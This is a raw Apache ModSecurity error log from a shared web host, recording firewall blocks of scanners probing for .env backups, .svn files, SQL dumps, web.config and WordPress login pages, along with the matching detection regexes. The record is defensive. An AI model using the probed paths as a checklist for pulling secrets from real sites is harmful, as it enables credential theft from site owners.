[Tue May 26 17:44:24.334485 2026] [core:crit] [pid 924957:tid 925133] (13)Permission denied: [client 52.167.144.23:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 17:44:24.860657 2026] [security2:error] [pid 924957:tid 925180] [client 160.119.76.58:37368] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.76.119.160.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.lifestylemne.me"] [uri "/xmlrpc.php"] [unique_id "ahWOoOYv2AvxeXULfJdbQAAAAF0"]
[Tue May 26 17:44:25.022239 2026] [security2:error] [pid 924957:tid 925114] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOoOYv2AvxeXULfJdbOAAAABs"]
[Tue May 26 17:44:26.312438 2026] [security2:error] [pid 924957:tid 925131] [client 114.119.136.100:40025] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.toronto121mortgage.com"] [uri "/mortgage-renewals.html"] [unique_id "ahWOouYv2AvxeXULfJdbeAAAACw"], referer: http://www.orglearningblog.com/listing/mortgage-renewal-11197
[Tue May 26 17:44:26.765529 2026] [security2:error] [pid 924957:tid 925105] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOouYv2AvxeXULfJdbdwAAABI"]
[Tue May 26 17:44:26.873380 2026] [security2:error] [pid 924957:tid 925123] [client 184.154.36.177:59852] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "mpdpl.in"] [uri "/css/style.css"] [unique_id "ahWOouYv2AvxeXULfJdbiwAAACQ"]
[Tue May 26 17:44:27.078689 2026] [security2:error] [pid 924957:tid 925134] [client 207.241.173.169:33190] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpanel.karuppuswamykovil.in"] [uri "/___proxy_subdomain_cpanel/.env.production.copy"] [unique_id "ahWOo-Yv2AvxeXULfJdbkwAAAC8"]
[Tue May 26 17:44:27.104347 2026] [security2:error] [pid 924957:tid 925047] [remote 31.24.44.107:59924] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.44.24.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWOouYv2AvxeXULfJdbjQAAZVk"]
[Tue May 26 17:44:27.185006 2026] [security2:error] [pid 924957:tid 925048] [remote 45.148.10.5:50784] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/web.config"] [unique_id "ahWOo-Yv2AvxeXULfJdbmwAAcVo"]
[Tue May 26 17:44:27.404026 2026] [security2:error] [pid 924957:tid 925165] [client 184.154.36.177:60096] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "mpdpl.in"] [uri "/channel-partner-registration.php"] [unique_id "ahWOo-Yv2AvxeXULfJdbogAAAE4"]
[Tue May 26 17:44:27.917694 2026] [security2:error] [pid 924957:tid 925160] [client 207.241.173.169:33678] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpanel.karuppuswamykovil.in"] [uri "/___proxy_subdomain_cpanel/.env.production.orig"] [unique_id "ahWOo-Yv2AvxeXULfJdbuQAAAEk"]
[Tue May 26 17:44:27.918099 2026] [security2:error] [pid 924957:tid 925185] [client 207.241.173.169:33632] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpanel.karuppuswamykovil.in"] [uri "/___proxy_subdomain_cpanel/.env.production.old"] [unique_id "ahWOo-Yv2AvxeXULfJdbvAAAAGI"]
[Tue May 26 17:44:27.918238 2026] [security2:error] [pid 924957:tid 925214] [client 207.241.173.169:33586] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpanel.karuppuswamykovil.in"] [uri "/___proxy_subdomain_cpanel/.env.local.swp"] [unique_id "ahWOo-Yv2AvxeXULfJdbwQAAAH8"]
[Tue May 26 17:44:27.918316 2026] [security2:error] [pid 924957:tid 925093] [client 207.241.173.169:33486] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpanel.karuppuswamykovil.in"] [uri "/___proxy_subdomain_cpanel/.env.old"] [unique_id "ahWOo-Yv2AvxeXULfJdbvQAAAAY"]
[Tue May 26 17:44:27.919000 2026] [security2:error] [pid 924957:tid 925203] [client 207.241.173.169:33622] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpanel.karuppuswamykovil.in"] [uri "/___proxy_subdomain_cpanel/.env.production.bak"] [unique_id "ahWOo-Yv2AvxeXULfJdbvgAAAHQ"]
[Tue May 26 17:44:27.919235 2026] [security2:error] [pid 924957:tid 925113] [client 207.241.173.169:33640] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpanel.karuppuswamykovil.in"] [uri "/___proxy_subdomain_cpanel/.env.production.backup"] [unique_id "ahWOo-Yv2AvxeXULfJdbuwAAABo"]
[Tue May 26 17:44:27.919657 2026] [security2:error] [pid 924957:tid 925135] [client 207.241.173.169:33582] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpanel.karuppuswamykovil.in"] [uri "/___proxy_subdomain_cpanel/.env.local~"] [unique_id "ahWOo-Yv2AvxeXULfJdbwgAAADA"]
[Tue May 26 17:44:27.919732 2026] [security2:error] [pid 924957:tid 925160] [client 207.241.173.169:33494] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpanel.karuppuswamykovil.in"] [uri "/___proxy_subdomain_cpanel/.env.backup"] [unique_id "ahWOo-Yv2AvxeXULfJdbxgAAAEk"]
[Tue May 26 17:44:27.920017 2026] [security2:error] [pid 924957:tid 925151] [client 207.241.173.169:33660] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpanel.karuppuswamykovil.in"] [uri "/___proxy_subdomain_cpanel/.env.production~"] [unique_id "ahWOo-Yv2AvxeXULfJdbvwAAAEA"]
[Tue May 26 17:44:27.921845 2026] [security2:error] [pid 924957:tid 925125] [client 207.241.173.169:33596] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpanel.karuppuswamykovil.in"] [uri "/___proxy_subdomain_cpanel/.env.local.orig"] [unique_id "ahWOo-Yv2AvxeXULfJdbxQAAACY"]
[Tue May 26 17:44:27.922356 2026] [security2:error] [pid 924957:tid 925139] [client 207.241.173.169:33564] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpanel.karuppuswamykovil.in"] [uri "/___proxy_subdomain_cpanel/.env.local.backup"] [unique_id "ahWOo-Yv2AvxeXULfJdbxAAAADQ"]
[Tue May 26 17:44:27.922409 2026] [security2:error] [pid 924957:tid 925177] [client 207.241.173.169:33558] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpanel.karuppuswamykovil.in"] [uri "/___proxy_subdomain_cpanel/.env.local.old"] [unique_id "ahWOo-Yv2AvxeXULfJdbxwAAAFo"]
[Tue May 26 17:44:27.923153 2026] [security2:error] [pid 924957:tid 925091] [client 207.241.173.169:33544] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpanel.karuppuswamykovil.in"] [uri "/___proxy_subdomain_cpanel/.env.local.bak"] [unique_id "ahWOo-Yv2AvxeXULfJdbyQAAAAQ"]
[Tue May 26 17:44:27.923183 2026] [security2:error] [pid 924957:tid 925201] [client 207.241.173.169:33542] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpanel.karuppuswamykovil.in"] [uri "/___proxy_subdomain_cpanel/.env.copy"] [unique_id "ahWOo-Yv2AvxeXULfJdbyAAAAHI"]
[Tue May 26 17:44:27.925697 2026] [security2:error] [pid 924957:tid 925090] [client 207.241.173.169:33540] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpanel.karuppuswamykovil.in"] [uri "/___proxy_subdomain_cpanel/.env.orig"] [unique_id "ahWOo-Yv2AvxeXULfJdbywAAAAM"]
[Tue May 26 17:44:27.927760 2026] [security2:error] [pid 924957:tid 925098] [client 207.241.173.169:33524] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpanel.karuppuswamykovil.in"] [uri "/___proxy_subdomain_cpanel/.env.swp"] [unique_id "ahWOo-Yv2AvxeXULfJdbzAAAAAs"]
[Tue May 26 17:44:27.927956 2026] [security2:error] [pid 924957:tid 925140] [client 207.241.173.169:33610] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpanel.karuppuswamykovil.in"] [uri "/___proxy_subdomain_cpanel/.env.local.copy"] [unique_id "ahWOo-Yv2AvxeXULfJdb0AAAADU"]
[Tue May 26 17:44:27.928093 2026] [security2:error] [pid 924957:tid 925105] [client 207.241.173.169:33516] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpanel.karuppuswamykovil.in"] [uri "/___proxy_subdomain_cpanel/.env~"] [unique_id "ahWOo-Yv2AvxeXULfJdbzgAAABI"]
[Tue May 26 17:44:27.928317 2026] [security2:error] [pid 924957:tid 925136] [client 207.241.173.169:33484] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpanel.karuppuswamykovil.in"] [uri "/___proxy_subdomain_cpanel/.env.bak"] [unique_id "ahWOo-Yv2AvxeXULfJdb0QAAADE"]
[Tue May 26 17:44:27.928492 2026] [security2:error] [pid 924957:tid 925212] [client 207.241.173.169:33666] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpanel.karuppuswamykovil.in"] [uri "/___proxy_subdomain_cpanel/.env.production.swp"] [unique_id "ahWOo-Yv2AvxeXULfJdbzQAAAH0"]
[Tue May 26 17:44:28.397747 2026] [security2:error] [pid 924957:tid 925166] [client 184.154.36.177:60486] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "mpdpl.in"] [uri "/css/sal.css"] [unique_id "ahWOpOYv2AvxeXULfJdb3QAAAE8"]
[Tue May 26 17:44:28.735181 2026] [security2:error] [pid 924957:tid 925206] [client 184.154.36.177:60614] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "mpdpl.in"] [uri "/index.php"] [unique_id "ahWOpOYv2AvxeXULfJdb6gAAAHc"]
[Tue May 26 17:44:29.425818 2026] [security2:error] [pid 924957:tid 925101] [client 184.154.36.177:60928] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "mpdpl.in"] [uri "/our-partners-projects.php"] [unique_id "ahWOpeYv2AvxeXULfJdcAQAAAA4"]
[Tue May 26 17:44:29.526961 2026] [security2:error] [pid 924957:tid 925183] [client 45.148.10.159:54746] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "mail.taotechservices.com"] [uri "/.svn/wc.db"] [unique_id "ahWOpeYv2AvxeXULfJdcDQAAAGA"]
[Tue May 26 17:44:29.925758 2026] [security2:error] [pid 924957:tid 925111] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOpeYv2AvxeXULfJdcBwAAABg"]
[Tue May 26 17:44:30.040202 2026] [security2:error] [pid 924957:tid 925137] [client 160.119.76.58:37430] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.76.119.160.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "lifestylemne.me"] [uri "/xmlrpc.php"] [unique_id "ahWOpuYv2AvxeXULfJdcIAAAADI"]
[Tue May 26 17:44:30.094913 2026] [security2:error] [pid 924957:tid 925096] [client 184.154.36.177:32958] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "mpdpl.in"] [uri "/css/bn5-key.css"] [unique_id "ahWOpuYv2AvxeXULfJdcIwAAAAk"]
[Tue May 26 17:44:30.379397 2026] [security2:error] [pid 924957:tid 925203] [client 184.154.36.177:33054] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "mpdpl.in"] [uri "/css/style.css"] [unique_id "ahWOpuYv2AvxeXULfJdcLAAAAHQ"]
[Tue May 26 17:44:30.736067 2026] [security2:error] [pid 924957:tid 925151] [client 184.154.36.177:33180] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "mpdpl.in"] [uri "/css/bn5-key.css"] [unique_id "ahWOpuYv2AvxeXULfJdcNgAAAEA"]
[Tue May 26 17:44:30.879239 2026] [security2:error] [pid 924957:tid 925201] [client 160.119.76.58:37434] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.76.119.160.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "lifestylemne.me"] [uri "/wp-login.php"] [unique_id "ahWOpuYv2AvxeXULfJdcPwAAAHI"]
[Tue May 26 17:44:31.019775 2026] [security2:error] [pid 924957:tid 925212] [client 184.154.36.177:33282] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "mpdpl.in"] [uri "/css/style.css"] [unique_id "ahWOp-Yv2AvxeXULfJdcRQAAAH0"]
[Tue May 26 17:44:31.378264 2026] [security2:error] [pid 924957:tid 925168] [client 184.154.36.177:33448] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "mpdpl.in"] [uri "/careers.php"] [unique_id "ahWOp-Yv2AvxeXULfJdcUAAAAFE"]
[Tue May 26 17:44:31.709713 2026] [security2:error] [pid 924957:tid 925150] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOp-Yv2AvxeXULfJdcTwAAAD8"]
[Tue May 26 17:44:31.968675 2026] [security2:error] [pid 924957:tid 925188] [client 185.191.171.13:27336] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "mahehealthcare.com"] [uri "/robots.txt"] [unique_id "ahWOp-Yv2AvxeXULfJdcZwAAAGU"]
[Tue May 26 17:44:31.968855 2026] [security2:error] [pid 924957:tid 925188] [client 185.191.171.13:27336] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "mahehealthcare.com"] [uri "/robots.txt"] [unique_id "ahWOp-Yv2AvxeXULfJdcZwAAAGU"]
[Tue May 26 17:44:32.321397 2026] [security2:error] [pid 924957:tid 925136] [client 184.154.36.177:33876] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "mpdpl.in"] [uri "/completed-projects.php"] [unique_id "ahWOqOYv2AvxeXULfJdcdAAAADE"]
[Tue May 26 17:44:32.934976 2026] [security2:error] [pid 924957:tid 925189] [client 184.154.36.177:34214] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "mpdpl.in"] [uri "/about-us.php"] [unique_id "ahWOqOYv2AvxeXULfJdcgAAAAGY"]
[Tue May 26 17:44:33.157418 2026] [security2:error] [pid 924957:tid 925039] [remote 45.148.10.5:50784] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/database.sql"] [unique_id "ahWOqeYv2AvxeXULfJdcjAAALlE"]
[Tue May 26 17:44:33.247702 2026] [security2:error] [pid 924957:tid 925122] [client 45.148.10.159:54746] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "mail.taotechservices.com"] [uri "/.svn/entries"] [unique_id "ahWOqeYv2AvxeXULfJdcjQAAACM"]
[Tue May 26 17:44:33.774253 2026] [security2:error] [pid 924957:tid 925165] [client 185.191.171.7:31454] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "mahehealthcare.com"] [uri "/"] [unique_id "ahWOqeYv2AvxeXULfJdcoQAAAE4"]
[Tue May 26 17:44:33.774412 2026] [security2:error] [pid 924957:tid 925165] [client 185.191.171.7:31454] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "mahehealthcare.com"] [uri "/"] [unique_id "ahWOqeYv2AvxeXULfJdcoQAAAE4"]
[Tue May 26 17:44:33.915679 2026] [security2:error] [pid 924957:tid 924958] [remote 45.148.10.5:50784] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/dump.sql"] [unique_id "ahWOqeYv2AvxeXULfJdcpQAAAwA"]
